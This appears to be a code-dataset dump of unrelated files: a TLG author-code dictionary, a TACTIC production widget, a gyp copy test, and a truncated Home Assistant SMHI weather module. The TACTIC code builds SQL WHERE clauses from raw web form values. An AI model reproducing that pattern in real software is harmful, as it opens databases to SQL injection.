"1288": "Craterus Hist.",
"9018": "Arsenius Paroemiogr.",
"3185": "Anonymus De Scientia Politica Hist.",
"2110": "Cyrillus Scr. Eccl.",
"1603": "[Phintys] Phil.",
"0314": "Morsimus Trag.",
"1314": "Dinias Hist.",
"1881": "Dionysius Scytobrachion Gramm.",
"2612": "Caecalus (?) Epic.",
"1309": "Dialexeis (ฮฮนฯฯฮฟแฝถ ฮปฯฮณฮฟฮน)",
"2724": "Ammonius Scr. Eccl.",
"0524": "Sophron Mimogr.",
"0347": "Serapion Trag.",
"0448": "Dromo Comic.",
"0732": "Alexander Phil.",
"0467": "Timotheus Trag.",
"2186": "Leo Hist.",
"2445": "Amometus Hist.",
"0208": "Dosiadas Lyr.",
"0406": "Anaxilas Comic.",
"0414": "Apollophanes Comic.",
"2619": "Dionysius Epic.",
"1681": "Solonis Epistulae",
"2004": "Amelii Epistula",
"1271": "Clemens Romanus Theol. et Clementina",
"2273": "Damon Hist.",
"2260": "Hippasus Phil.",
"0550": "Apollonius Geom.",
"0146": "Boethus Epigr.",
"0433": "Crates Comic.",
"0630": "Pherecydes Myth. et Phil.",
"0663": "Praecepta Salubria",
"4393": "Nonnosus Hist.",
"1016": "Ostanes Magus Alchem.",
"0623": "Cratetis Epistulae",
"0470": "Leuco Comic.",
"1304": "Democritus Phil.",
"0585": "Publius Aelius Phlegon Paradox.",
"1225": "Bion Hist.",
"0052": "Menippus Phil.",
"1395": "[Hegesinus] Epic.",
"2364": "Zeno Hist.",
"1412": "Pseudo-Heracliti Epistulae",
"0342": "Nicomachus Trag.",
"1160": "Apocalypsis Sophoniae",
"0463": "Hegemon Parodius",
"1772": "Paraleipomena Jeremiou",
"0057": "Galenus Med.",
"0395": "Diophantus Comic.",
"0141": "Athenaeus Epigr.",
"0512": "Theophilus Comic.",
"0719": "Aretaeus Med.",
"2043": "Hephaestion Astrol.",
"0494": "Philyllius Comic.",
"0265": "Timocreon Lyr.",
"1529": "Nicander Gramm.",
"0743": "Nemesius Theol.",
"1516": "Molpis Hist.",
"2580": "Joannes Laurentius Lydus Hist.",
"3141": "Georgius Acropolites Hist.",
"0542": "Julius Pollux Gramm.",
"1210": "Autolycus Astron.",
"1393": "Hegesianax Astron. et Epic.",
"0520": "Arcesilaus Comic.",
"1701": "Testamentum Abrahae",
"0518": "Xenarchus Comic.",
"0529": "Arius Didymus Doxogr.",
"0220": "Moero Epic.",
"1460": "Lesbonax Gramm.",
"2023": "Iamblichus Phil.",
"2404": "Philogelos",
"0376": "Timotheus Lyr.",
"2204": "Autocrates Hist.",
"0333": "Timocles Trag.",
"0707": "Alexis Hist.",
"0645": "Justinus Martyr Apol.",
"1248": "Celsus Phil.",
"1316": "Dinon Hist.",
"0729": "Theophilus Protospatharius Med.",
"1705": "Thales Phil.",
"0174": "Diotimus Epic.",
"2914": "Leontius Scr. Eccl.",
"1377": "Favorinus Phil. et Rhet.",
"1127": "Anonyma De Musica Scripta Bellermanniana",
"0437": "Crobylus Comic.",
"1345": "Epica Incerta (CA)",
"0217": "Anacreon Junior Eleg.",
"1680": "[Sodamus] Eleg.",
"0292": "Stesichorus Lyr.",
"2201": "[Ctesiphon] Hist.",
"2733": "Evagrius Scholasticus Scr. Eccl.",
"0714": "Anaxarchus Phil.",
"1629": "Polystratus Phil.",
"2881": "Romanus Melodus Hymnographus",
"1190": "Aristagoras Hist.",
"2039": "Diophantus Math.",
"0591": "Antisthenes Phil. et Rhet.",
"3127": "Pseudo-Nonnus",
"2766": "Eudocia Augusta Poeta",
"0436": "Crito Comic.",
"1191": "[Aristombrotus] Phil.",
"4015": "Joannes Philoponus Phil.",
"0253": "[Homerus] [Epic.]",
"0444": "Diodorus Comic.",
"1514": "Mnaseas Perieg.",
"3188": "Joannes Actuarius Med.",
"0557": "Epictetus Phil.",
"2300": "Promathidas Hist.",
"1202": "[Athamas] Phil.",
"0137": "Asclepiades Epigr.",
"1723": "Theolytus Epic.",
"1206": "Athenodorus Phil.",
"3135": "Joannes Zonaras Gramm. et Hist.",
"0302": "Choerilus Trag.",
"1720": "Theodotus Judaeus Epic.",
"2428": "Thrasyllus Hist.",
"0612": "Dio Chrysostomus Soph.",
"4081": "Colluthus Epic.",
"2009": "Martyrium Marini",
"2969": "Demonax Phil.",
"0029": "Dinarchus Orat.",
"1844": "Hera[clides] Trag.",
"5035": "Scholia In Platonem",
"5019": "Scholia In Dionysium Periegetam",
"0003": "Thucydides Hist.",
"0856": "Dieuches Med.",
"9020": "Stephanus Gramm.",
"7052": "Anthologiae Graecae Appendix",
"1177": "Pseudo-Archytas Phil.",
"1292": "Crito Phil.",
"1594": "Philo Judaeus Senior Epic.",
"0710": "Amphiarai Exilium (?)",
"0526": "Flavius Josephus Hist.",
"1477": "Manetho Hist.",
"0037": "Anacharsidis Epistulae",
"0634": "Xenocrates Phil.",
"2640": "Eusebius Phil.",
"0284": "Aelius Aristides Rhet.",
"1509": "[Milon] [Phil.]",
"0597": "Zenodorus Gramm.",
"2005": "Martyrium Pionii",
"2797": "Hesychius Scr. Eccl.",
"2424": "Chaeremon Hist. et Phil.",
"4286": "Lexica Syntactica",
"4173": "Vitae Dionysii Periegetae",
"2052": "Horapollo Gramm.",
"1434": "Hippias Soph.",
"4323": "Eugenius Alchem.",
"1155": "Apocalypsis Syriaca Baruchi",
"0269": "Nautarum Cantiunculae",
"4088": "Anthemius Math. et Mech.",
"1484": "Martyrium Polycarpi",
"0095": "Hermodorus Phil.",
"4093": "Georgius Choeroboscus Gramm.",
"2565": "Mnesimachus Hist.",
"4344": "Menecrates Hist.",
"1733": "Timaeus Hist.",
"0075": "Periplus Ponti Euxini",
"2586": "Menander Rhet.",
"0020": "Hesiodus Epic.",
"5038": "Scholia In Theocritum",
"0435": "Cratinus Junior Comic.",
"1597": "[Telauges] Phil.",
"5040": "Scholia In Xenophontem",
"3086": "Nicephorus I Scr. Eccl., Hist. et Theol.",
"1367": "Euripidis Epistulae",
"1426": "Herodes Atticus Soph.",
"1572": "[Perictione] Phil.",
"2653": "Erycius Poeta",
"0461": "Eupolis Comic.",
"1780": "Alcimenes Comic.",
"5015": "Scholia In Aristotelem",
"1154": "Apocalypsis Baruch",
"1135": "Anonymus Photii Phil.",
"1859": "Liber Jannes Et Jambres",
"1134": "Anonymus Iamblichi Phil.",
"1350": "Epistula Ad Diognetum",
"0238": "Ananius Iamb.",
"2646": "Fragmenta Adespota (SH)",
"1849": "Demetrius Trag.",
"0320": "Diogenes Trag.",
"2511": "Demetrius Hist.",
"1366": "Evangelium Bartholomaei",
"0438": "Damoxenus Comic.",
"1207": "Attalus Astron. et Math.",
"2631": "Menophilus Poeta",
"0304": "Acta Et Martyrium Apollonii",
"1636": "Protagorides Hist.",
"1738": "Tragica Adespota",
"2734": "Flavius Justinianus Imperator Theol.",
"1147": "Antiphon Soph.",
"4145": "Nicephorus Gregoras Hist.",
"0534": "Callisthenes Hist.",
"0079": "Menippus Geogr.",
"0408": "Comica Adespota (CAF)",
"1129": "Anonymi De Barbarismo Et Soloecismo Gramm.",
"0006": "Euripides Trag.",
"1552": "Oratio Josephi",
"4066": "Damascius Phil.",
"0069": "Dionysius Geogr.",
"4085": "Hesychius Lexicogr.",
"0480": "Nicochares Comic.",
"4135": "Theodorus Theol.",
"1600": "Philostratus Major Soph.",
"0017": "Isaeus Orat.",
"5031": "Scholia In Nicandrum",
"0507": "Straton Comic.",
"3158": "Theodorus Epist.",
"0367": "Tynnichus Lyr.",
"1294": "Critolaus Phil.",
"0517": "Timotheus Comic.",
"0423": "Autocrates Comic.",
"5052": "Scholia in Maximum Confessorem",
"2950": "Adamantius Theol.",
"2385": "Polycritus Hist.",
"1379": "Fragmenta Alchemica",
"2130": "Arethas Philol. et Scr. Eccl.",
"2634": "Pamphilus Poeta",
"1534": "Nicocles Hist.",
"0641": "Xenophon Scr. Erot.",
"0651": "Antoninus Liberalis Myth.",
"1452": "Juba II Rex Mauretaniae [Hist.]",
"1312": "Didymus Gramm.",
"2084": "Basilius Med. et Scr. Eccl.",
"1642": "Pseudo-Ptolemaeus",
"0363": "Claudius Ptolemaeus Math.",
"1550": "Oracula Chaldaica",
"0676": "Aglaรฏs Poet. Med.",
"1240": "Callixenus Hist.",
"1559": "Bucolicum",
"2536": "Andron Geogr.",
"2287": "Fragmentum Stoicum",
"2122": "Gaius Asinius Quadratus Hist.",
"2573": "Pausanias Hist.",
"0222": "Eratosthenes et Eratosthenica Philol.",
"4084": "Zosimus Hist.",
"0577": "Nicolaus Hist.",
"4235": "Joannes Rhet.",
"1244": "Carneiscus Phil.",
"0686": "Aethlius Hist.",
"4100": "Aphthonius Rhet.",
"0391": "Acta Scillitanorum Martyrum",
"2140": "Iamblichus Alchem.",
"0569": "Apollonius Paradox.",
"2512": "Paeon Hist.",
"2649": "Amyntas Epigr.",
"1499": "Menecles Hist.",
"4033": "Anonymi In Aristotelis Ethica Nicomachea Phil.",
"1139": "Anonymi Historici (FGrH)",
"0576": "Musaeus Epic.",
"0434": "Cratinus Comic.",
"2632": "Comarius Alchem.",
"2721": "Theodorus Prodromus Poeta et Polyhist.",
"1197": "Artemon Gramm.",
"0259": "Scythinus Poet. Phil.",
"0072": "Anonymi Grammatici Gramm.",
"0658": "Heliodorus Scr. Erot.",
"0024": "Oppianus Epic.",
"0033": "Pindarus Lyr.",
"0323": "Antiphon Trag.",
"1425": "Hermonax Epic.",
"0519": "Xeno Comic.",
"4318": "Vita Sophoclis",
"0330": "Dionysius I [Trag.]",
"1828": "Pamphila Hist.",
"0486": "Pherecrates Comic.",
"1547": "Oedipodea",
"1347": "Epimenides Phil.",
"0731": "Adamantius Judaeus Med.",
"4101": "Etymologicum Parvum",
"4124": "Eusebius Scr. Eccl.",
"0227": "Anonymi Curetum Hymnus",
"1748": "Sosigenes Phil.",
"2652": "Diodorus Eleg.",
"1747": "Vita Adam Et Evae",
"0432": "Clearchus Comic.",
"0845": "Ctesias Hist. et Med.",
"1703": "Teucer Astrol.",
"4086": "[Agathodaemon] Alchem.",
"4031": "Eustratius Phil.",
"2102": "Didymus Caecus Scr. Eccl., Didymus the Blind",
"0464": "Hegesippus Comic.",
"0271": "Conventus Avium",
"1342": "Empedocles Poet. Phil.",
"2866": "Oecumenius Phil. et Rhet.",
"1526": "Neoptolemus Gramm.",
"0428": "Cantharus Comic.",
"0365": "Apollodorus Lyr.",
"1339": "Duris Hist.",
"1917": "Demetrius Hist.",
"0247": "Dionysius II [Eleg.]",
"2624": "Hermias Poeta",
"1218": "Basilis Hist.",
"1021": "Meropis",
"0459": "Eunicus Comic.",
"0329": "Theodectas Trag.",
"1471": "Lyrica Adespota (SLG)",
"0032": "Xenophon Hist.",
"2037": "Joannes Stobaeus Anthologus",
"4115": "Theophilus Scr. Eccl.",
"2622": "Dorieus Poeta",
"1152": "Apion Gramm.",
"0004": "Diogenes Laertius Biogr.",
"5033": "Scholia In Pausaniam",
"2806": "Marcus Diaconus Scr. Eccl.",
"1645": "Ptolemaeus VIII Euergetes II [Hist.]",
"0094": "Pseudo-Plutarchus",
"1183": "Aristeae Epistula",
"2699": "Amphicrates Rhet.",
"0281": "Marcellus Poet. Med.",
"4175": "Commentaria In Dionysii Thracis Artem Grammaticam",
"9023": "Thomas Magister Philol.",
"1560": "Matthiae Traditiones",
"5046": "Scholia In Theonem Rhetorem",
"2444": "Lycophron Soph.",
"3140": "Joel Chronogr.",
"0697": "Cornelius Alexander Polyhist.",
"3088": "Nicephorus Bryennius Hist.",
"1487": "Maximus Astrol.",
"0228": "Anonymi Hymnus In Dactylos Idaeos",
"1793": "Timoxenus Comic.",
"2038": "Acta Thomae",
"1131": "Anonymus Ad Avircium Marcellum Contra Cataphrygas",
"0671": "Philumenus Med.",
"0563": "Maximus Soph.",
"5023": "Scholia In Euripidem",
"2319": "Apollodorus Phil.",
"0667": "Marcellinus I Med.",
"5002": "Magica",
"0683": "Aethiopis",
"0099": "Strabo Geogr.",
"0654": "Lucius Annaeus Cornutus Phil.",
"0231": "Elegiaca Adespota (CA)",
"1699": "Teles Phil.",
"1683": "Sophaenetus Hist.",
"2210": "Anaxicrates Hist.",
"0725": "Anaximander Phil.",
"0214": "Phanocles Eleg.",
"0568": "Antigonus Paradox.",
"4134": "Diodorus Scr. Eccl.",
"0897": "Euthydemus Med.",
"0639": "Menecrates Med.",
"0309": "Achaeus Trag.",
"1615": "Platonius Gramm.",
"1258": "Charon Hist.",
"2112": "Amphilochius Scr. Eccl.",
"1375": "Evangelium Thomae",
"0476": "Mnesimachus Comic.",
"0888": "Eudemus Poet. Med.",
"4331": "Hierotheus Alchem.",
"1251": "Chamaeleon Phil.",
"4307": "Lexica Synonymica",
"0595": "Zeno Phil.",
"2399": "Eudromus Phil.",
"1307": "Demon Hist.",
"1496": "Memnon Hist.",
"0258": "Pigres Eleg.",
"1446": "Ion Eleg.",
"1666": "Sententiae Sexti",
"1585": "Pherecydis Epistula",
"0570": "Archelaus Paradox.",
"1223": "Bias [Phil.]",
"4061": "Cosmas Indicopleustes Geogr.",
"4288": "Lexicon ฮฑแผฑฮผฯฮดฮตแฟฮฝ",
"0662": "Comica Adespota (CGFPR)",
"1357": "Eudemus Phil.",
"2966": "Phileas Scr. Eccl.",
"2231": "Thrasyalces Phil.",
"2190": "[Clitonymus] Hist.",
"0018": "Philo Judaeus Phil.",
"1118": "Pseudo-Dioscorides Med.",
"1848": "Meletus Junior Trag.",
"DOCCAN1": "TLG Canon, bibliography",
"1605": "Pseudo-Phocylides Gnom.",
"0475": "Metagenes Comic.",
"0479": "Nico Comic.",
"1915": "Eudoxus Hist.",
"0060": "Diodorus Siculus Hist.",
"0537": "Epicurus Phil.",
"1184": "Aristides Apol.",
"2185": "Dionysius ฮฮตฯฮฑฮธฮญฮผฮตฮฝฮฟฯ Phil.",
"2354": "Dionysius Hist.",
"0620": "Archytas Phil.",
"5018": "Scholia In Dionysium Byzantium",
"2202": "[Menyllus] Hist.",
"0186": "Marcus Cornelius Fronto Rhet.",
"1548": "Oenomaus Phil.",
"1245": "Carystius Hist.",
"4126": "Theodorus Scr. Eccl.",
"0427": "[Callippus] Comic.",
"2398": "Basilides Phil.",
"0440": "Demetrius Junior Comic.",
"0495": "Phoenicides Comic.",
"0816": "Theudo[tus] Trag.",
"2141": "Publius Herennius Dexippus Hist.",
"2602": "Timaeus Sophista Gramm.",
"1711": "[Thearidas] Phil.",
"0738": "Hippiatrica",
"0468": "Hipparchus Comic.",
"0722": "Oribasius Med.",
"0580": "Paradoxographus Florentinus",
"3069": "Leo Diaconus Hist.",
"0652": "Philostratus Junior Soph.",
"3051": "Georgius Monachus Continuatus",
"2877": "Cyrillus Biogr.",
"2232": "Damon Mus.",
"3014": "Joannes Camaterus Astrol. et Astron.",
"0737": "Julianus Scriptor Legis De Medicis",
"1525": "Neanthes Hist.",
"2606": "Agathyllus Eleg.",
"2525": "Laetus Hist.",
"2172": "Andron Hist.",
"0306": "Aristarchus Trag.",
"0382": "Castorion Lyr.",
"1987": "Theodorus Poeta",
"0728": "Theophilus Protospatharius, Damascius et Stephanus Atheniensis Med.",
"0431": "Chionides Comic.",
"1409": "Heraclides Ponticus Phil.",
"0527": "Septuaginta",
"1128": "Anonymi Commentarius In Platonis Theaetetum",
"0355": "Zopyrus Trag.",
"0047": "Pausaniae I Et Xerxis Epistulae",
"1421": "Hermippus Gramm. et Hist.",
"1420": "Hermias Iamb.",
"4102": "Catenae (Novum Testamentum)",
"0267": "Xenophanes Poet. Phil.",
"2304": "Idaeus Phil.",
"0010": "Isocrates Orat.",
"0131": "Archimelus Epigr.",
"1173": "Archedemus Phil.",
"0358": "Nicomachus Math.",
"0055": "Themistoclis Epistulae",
"1178": "[Aresas] Phil.",
"1087": "Cleophon Trag.",
"1504": "Menelaus Epic.",
"2265": "Diodorus Perieg.",
"1470": "Lycus Hist.",
"1461": "Leucippus Phil.",
"0715": "Paulus Med.",
"4293": "Fragmentum Lexici Graeci",
"1176": "Archytas Epic.",
"2326": "Dei(l)ochus Hist.",
"0425": "Bato Comic.",
"0407": "Anaxippus Comic.",
"1819": "Pseudo-Demosthenes Epigr.",
"1200": "Asclepiades Myth.",
"0165": "Diodorus Rhet.",
"1443": "Ignatius Scr. Eccl.",
"1419": "Hermas Scr. Eccl., Pastor Hermae",
"2268": "Timagoras Hist.",
"2119": "Christodorus Epic.",
"0411": "Apollodorus Comic.",
"1252": "Certamen Homeri Et Hesiodi",
"2904": "Nicolaus Rhet. et Soph.",
"0278": "Praelusio Mimi",
"0359": "Isidorus Scriptor Hymnorum",
"4187": "Leo Magentinus Phil.",
"1388": "Harmodius Hist.",
"0262": "Socrates Phil.",
"0487": "Philemon Comic.",
"2552": "Critolaus Hist.",
"3159": "Barlaam Math., Theol. et Epist.",
"2060": "Asterius Scr. Eccl.",
"2449": "Timotheus Gramm.",
"0491": "Philiscus Comic.",
"4046": "Theophanes Confessor Chronogr.",
"2639": "Posidonius Epic.",
"0216": "Alexander Lyr. et Trag.",
"0607": "Aelius Theon Rhet.",
"1272": "Cleomedes Astron.",
"0357": "Didymus Scriptor De Mensuris",
"1266": "Tyrannion Gramm.",
"1696": "Straton Phil.",
"0454": "Epinicus Comic.",
"1158": "Apocalypsis Joannis",
"0011": "Sophocles Trag.",
"3040": "Josephus Genesius Hist.",
"4153": "Theophanes Continuatus",
"2200": "Libanius Rhet. et Soph.",
"2306": "Xenomedes Hist.",
"2193": "[Aretades] Hist.",
"1906": "Simonides Epic.",
"0452": "Epigenes Comic.",
"0625": "Polemaeus Trag.",
"1166": "Apollodorus Phil.",
"1442": "Idomeneus Hist.",
"4080": "Geoponica",
"2298": "Lysanias Hist.",
"1306": "Bolus Med. et Phil.",
"2393": "Andreas Hist.",
"0081": "Dionysius Halicarnassensis Hist. et Rhet.",
"0389": "Acta Petri",
"0354": "Zenodotus Trag.",
"1462": "Liber Eldad Et Modad",
"3144": "Joannes Cananus Hist.",
"1562": "Parmenides Poet. Phil.",
"4289": "Lexica Segueriana",
"9007": "Appendix Proverbiorum",
"1313": "Dieuchidas Hist.",
"1588": "Philicus Lyr.",
"1651": "Pythermus Hist.",
"1170": "Apollonius Hist.",
"1199": "Asclepiades Gramm. et Hist.",
"1784": "[Heraclitus] Comic.",
"0215": "Antagoras Epic.",
"2627": "Damianus Scriptor De Opticis",
"2418": "Archinus Hist.",
"0002": "Theognis Eleg.",
"0366": "Lasus Lyr.",
"0242": "Asius Eleg. et Epic.",
"1262": "Choerilus Epic.",
"3182": "Pseudo-Symeon Hist.",
"0035": "Moschus Bucol.",
"1641": "Ptolemaeus Gnost.",
"1765": "Vitae Aesopi",
"2168": "Apollophanes Phil.",
"2203": "[Theophilus] Hist.",
"0629": "Periander [Phil.]",
"1052": "Posidonius Phil.",
"0560": "[Longinus] Rhet., Pseudo-Longinus",
"4020": "Elias Phil.",
"4030": "Sophonias Phil.",
"1650": "Pytheas Perieg.",
"1264": "Chrysippus Phil.",
"0565": "Soranus Med.",
"2426": "Hermaeus Hist.",
"1205": "Athenagoras Apol.",
"2014": "Acta Phileae",
"2054": "Aristides Quintilianus Mus.",
"1249": "Cephalion Hist. et Rhet.",
"0296": "Carmina Convivialia (PMG)",
"1661": "Satyrus Hist.",
"2245": "Simus Phil.",
"1759": "Sententiae Pythagoreorum",
"1706": "Thallus Hist.",
"2286": "Cercops Phil.",
"4227": "Anonymus De Philosophia Platonica Phil.",
"5025": "Scholia In Hesiodum",
"1553": "[Palaephatus] Myth.",
"4013": "Simplicius Phil.",
"3064": "Scylitzes Continuatus",
"0381": "Lycophronides Lyr.",
"0415": "Araros Comic.",
"0403": "Amipsias Comic.",
"0539": "Hellanicus Hist.",
"2018": "Eusebius Scr. Eccl. et Theol.",
"0293": "Ibycus Lyr.",
"0501": "Sannyrion Comic.",
"1392": "Hegesander Hist.",
"2460": "Glaucus Hist.",
"2017": "Gregorius Nyssenus Theol.",
"4305": "Claudius Casilon Gramm.",
"1623": "Polycharmus Hist.",
"0015": "Herodianus Hist.",
"2694": "Sostratus Poeta",
"0116": "Abydenus Hist.",
"2417": "Cineas Rhet.",
"1433": "Hipparchus [Epigr.]",
"0379": "Philoxenus Lyr.",
"2212": "Lyceas Hist.",
"0310": "Carcinus Trag.",
"2934": "Joannes Damascenus Scr. Eccl. et Theol., John of Damascus",
"0202": "Mace(donius) Lyr.",
"1226": "Biton Mech.",
"4001": "Aeneas Phil. et Rhet.",
"1751": "Xanthus Hist.",
"0745": "Hierophilus Phil. et Soph.",
"1678": "Socrates Hist.",
"1719": "Theodosius Astron. et Math.",
"0328": "Chaeremon Trag.",
"2392": "Artemon Hist.",
"0419": "Aristomenes Comic.",
"2003": "Flavius Claudius Julianus Imperator Phil., Julian the Apostate",
"2339": "Maeandrius Hist.",
"0276": "Cantus Lugubris",
"1992": "Ariston Apol.",
"1695": "[Sthenidas] Phil.",
"1405": "Heraclides Criticus Perieg.",
"2064": "Acacius Theol.",
"0400": "Alcaeus Comic.",
"0608": "Satyrus Biogr.",
"1355": "Erinna Lyr.",
"0280": "Andromachus Poet. Med.",
"2050": "Eunapius Hist. et Soph.",
"1400": "Heliodorus Perieg.",
"2195": "[Chrysermus] Hist.",
"1250": "Cercidas Iamb.",
"1749": "Vitae Hesiodi Particula",
"9003": "Anonymus Lexicographus Lexicogr.",
"3187": "Georgius Gramm.",
"2341": "Aristocritus Hist.",
"0318": "Agathon Trag.",
"1654": "Rhinthon Comic.",
"1570": "Epitaphium Pectorii",
"2046": "Quintus Epic.",
"7000": "Anthologia Graeca, AG",
"1558": "Papias Scr. Eccl.",
"1469": "Lyceas Hist.",
"2244": "Damon et Phintias Phil.",
"1714": "Theocritus Soph.",
"0626": "Heraclitus Phil.",
"1444": "Ilias Parva",
"4328": "Philosophus Christianus Alchem.",
"0627": "Hippocrates Med. et Corpus Hippocraticum",
"4167": "Leontius Mech.",
"2600": "Simon Scriptor De Re Equestri",
"1268": "Claudius Iolaus Hist.",
"4083": "Eustathius Philol. et Scr. Eccl.",
"1150": "Aphareus Rhet.",
"3186": "Anonymus Dialogus Cum Judaeis",
"1908": "Daimachus Hist.",
"0064": "Periplus Hannonis",
"4319": "Zosimus Alchem.",
"0413": "Apollodorus Comic.",
"1341": "[Ecphantus] Phil.",
"1781": "Philippus Comic.",
"0742": "Hymni Anonymi",
"0587": "Sotion [Paradox.]",
"1858": "Oratio Manassis",
"1429": "Hierocles Phil.",
"9010": "Suda, Suidas",
"1145": "Antiochus Hist.",
"1542": "Numenius Phil.",
"3115": "Symeon Metaphrastes Biogr. et Hist.",
"4294": "Lexicon Vindobonense",
"0546": "Aelianus Tact.",
"3018": "Georgius Cedrenus Chronogr.",
"2596": "Phoebammon Soph.",
"0584": "Philostephanus Hist.",
"1613": "Pittaci Epistula",
"1617": "Marcus Antonius Polemon Soph.",
"1576": "Phaedimus [Epic.]",
"1291": "Creophylus Hist.",
"0084": "Dionysius Perieg.",
"0305": "Aristias Trag.",
"2248": "Acta Xanthippae Et Polyxenae",
"0659": "Comica Adespota (Suppl. Com.)",
}
|
mit
|
hsuchie4/TACTIC
|
src/pyasm/prod/web/artist_view_wdg.py
|
6
|
5064
|
###########################################################
#
# Copyright (c) 2005, Southpaw Technology
# All Rights Reserved
#
# PROPRIETARY INFORMATION. This software is proprietary to
# Southpaw Technology, and is not to be reproduced, transmitted,
# or disclosed in any way without written permission.
#
#
#
__all__=['ArtistViewWdg']
from pyasm.common import Environment
from pyasm.search import Search
from pyasm.biz import StatusEnum, Pipeline, Project
from pyasm.web import Widget, WebContainer, SpanWdg
from pyasm.widget import CheckboxWdg
class ArtistViewWdg(SpanWdg):
def init(my):
my.add("Show assigned only: ")
my.checkbox = CheckboxWdg("show_assigned_only")
my.checkbox.set_option("value", "on")
my.checkbox.set_persistence()
my.checkbox.add_event("onclick", "document.form.submit()")
my.add(my.checkbox)
my.add_class("med")
def is_supervisor(my):
# if the user is a supervisor, look at all of the assets
project = Project.get_project_name()
security = Environment.get_security()
return security.check_access("prod/%s" % project, "model/supervisor", "true")
def is_artist(my):
# if the user is a artist, look at all of the assets
project = Project.get_project_name()
security = Environment.get_security()
return security.check_access("prod/%s" % project, "model/artist", "true")
def alter_search(my, search):
# get all of the relevant tasks to the user
task_search = Search("sthpw/task")
task_search.add_column("search_id")
# only look at this project
project = Project.get_project_name()
task_search.add_filter("search_type", search.get_search_type())
# figure out who the user is
security = Environment.get_security()
login = security.get_login()
user = login.get_value("login")
print "is_artist: ", my.is_artist()
print "is_supervisor: ", my.is_supervisor()
# do some filtering
web = WebContainer.get_web()
show_assigned_only = my.checkbox.get_value()
show_process = web.get_form_values("process")
if not show_process or show_process[0] == '':
show_process = []
show_task_status = web.get_form_values("task_status")
if not show_task_status or show_task_status[0] == '':
show_task_status = []
if show_assigned_only == "on":
task_search.add_filter("assigned", user)
if show_process:
where = "process in (%s)" % ", ".join( ["'%s'" % x for x in show_process] )
task_search.add_where(where)
if show_task_status:
where = "status in (%s)" % ", ".join( ["'%s'" % x for x in show_task_status] )
task_search.add_where(where)
else:
task_search.add_where("NULL")
# record the tasks
my.tasks = task_search.get_sobjects()
# get all of the sobject ids
sobject_ids = ["'%s'" % x.get_value("search_id") for x in my.tasks]
# get all of the sobjects related to this task
if sobject_ids:
search.add_where( "id in (%s)" % ", ".join(sobject_ids) )
class SupervisorViewWdg(Widget):
def init(my):
my.add("Process: ")
checkbox = CheckboxWdg("process")
checkbox.set_option("value", "on")
checkbox.set_persistence()
checkbox.add_event("onclick", "document.form.submit()")
my.add(checkbox)
def filter_sobjects(my, orig_sobjects):
# look for groups that are relevant
groups = Environment.get_security().get_groups()
login = Environment.get_security().get_login()
# either we are user centric or process centric
user = login.get_value("login")
sobjects = []
# filter out sobjects that do not have appropriate tasks
if orig_sobjects:
search_type = orig_sobjects[0].get_search_type()
ids = [str(x.get_id()) for x in orig_sobjects]
search = Search("sthpw/task")
search.add_filter("search_type", search_type)
search.add_where("search_id in (%s)" % ",".join(ids) )
# get only tasks assigned to a user
show_assigned_only = True
if show_assigned_only:
search.add_filter("assigned", user)
search.add_where("status in ('Pending','In Progress')")
search.add_where("status is NULL")
tasks = search.get_sobjects()
task_search_ids = [int(x.get_value("search_id")) for x in tasks]
# once we have all of the tasks for this episode, we filter
# out any assets that don't have these tasks
for orig_sobject in orig_sobjects:
search_id = orig_sobject.get_id()
if search_id in task_search_ids:
sobjects.append(orig_sobject)
return sobjects
|
epl-1.0
|
eXcomm/cjdns
|
node_build/dependencies/libuv/build/gyp/test/copies/gyptest-default.py
|
264
|
1268
|
#!/usr/bin/env python
# Copyright (c) 2009 Google Inc. All rights reserved.
# Use of this source code is governed by a BSD-style license that can be
# found in the LICENSE file.
"""
Verifies file copies using the build tool default.
"""
import TestGyp
test = TestGyp.TestGyp()
test.run_gyp('copies.gyp', chdir='src')
test.relocate('src', 'relocate/src')
test.build('copies.gyp', chdir='relocate/src')
test.must_match(['relocate', 'src', 'copies-out', 'file1'], 'file1 contents\n')
test.built_file_must_match('copies-out/file2',
'file2 contents\n',
chdir='relocate/src')
test.built_file_must_match('copies-out/directory/file3',
'file3 contents\n',
chdir='relocate/src')
test.built_file_must_match('copies-out/directory/file4',
'file4 contents\n',
chdir='relocate/src')
test.built_file_must_match('copies-out/directory/subdir/file5',
'file5 contents\n',
chdir='relocate/src')
test.built_file_must_match('copies-out/subdir/file6',
'file6 contents\n',
chdir='relocate/src')
test.pass_test()
|
gpl-3.0
|
mezz64/home-assistant
|
homeassistant/components/smhi/weather.py
|
12
|
6669
|
"""Support for the Swedish weather institute weather service."""
import asyncio
from datetime import timedelta
import logging
from typing import Dict, List
import aiohttp
import async_timeout
from smhi import Smhi
from smhi.smhi_lib import SmhiForecastException
from homeassistant.components.weather import (
ATTR_FORECAST_CONDITION,
ATTR_FORECAST_PRECIPITATION,
ATTR_FORECAST_TEMP,
ATTR_FORECAST_TEMP_LOW,
ATTR_FORECAST_TIME,
WeatherEntity,
)
from homeassistant.config_entries import ConfigEntry
from homeassistant.const import CONF_LATITUDE, CONF_LONGITUDE, CONF_NAME, TEMP_CELSIUS
from homeassistant.core import HomeAssistant
from homeassistant.helpers import aiohttp_client
from homeassistant.util import Throttle, slugify
from .const import ATTR_SMHI_CLOUDINESS, ENTITY_ID_SENSOR_FORMAT
_LOGGER = logging.getLogger(__name__)
# Used to map condition from API results
CONDITION_CLASSES = {
"cloudy": [5, 6],
"fog": [7],
"hail": [],
"lightning": [21],
"lightning-rainy": [11],
"partlycloudy": [3, 4],
"pouring": [10, 20],
"rainy": [8, 9, 18, 19],
"snowy": [15, 16, 17, 25, 26, 27],
"snowy-rainy": [12, 13, 14, 22, 23, 24],
"sunny": [1, 2],
"windy": [],
"windy-variant": [],
"exceptional": [],
}
# 5 minutes between retrying connect to API again
RETRY_TIMEOUT = 5 * 60
MIN_TIME_BETWEEN_UPDATES = timedelta(minutes=31)
async def async_setup_entry(
hass: HomeAssistant, config_entry: ConfigEntry, config_entries
) -> bool:
"""Add a weather entity from map location."""
location = config_entry.data
name = slugify(location[CONF_NAME])
session = aiohttp_client.async_get_clientsession(hass)
entity = SmhiWeather(
location[CONF_NAME],
location[CONF_LATITUDE],
location[CONF_LONGITUDE],
session=session,
)
entity.entity_id = ENTITY_ID_SENSOR_FORMAT.format(name)
config_entries([entity], True)
return True
class SmhiWeather(WeatherEntity):
"""Representation of a weather entity."""
def __init__(
self,
name: str,
latitude: str,
longitude: str,
session: aiohttp.ClientSession = None,
) -> None:
"""Initialize the SMHI weather entity."""
self._name = name
self._latitude = latitude
self._longitude = longitude
self._forecasts = None
self._fail_count = 0
self._smhi_api = Smhi(self._longitude, self._latitude, session=session)
@property
def unique_id(self) -> str:
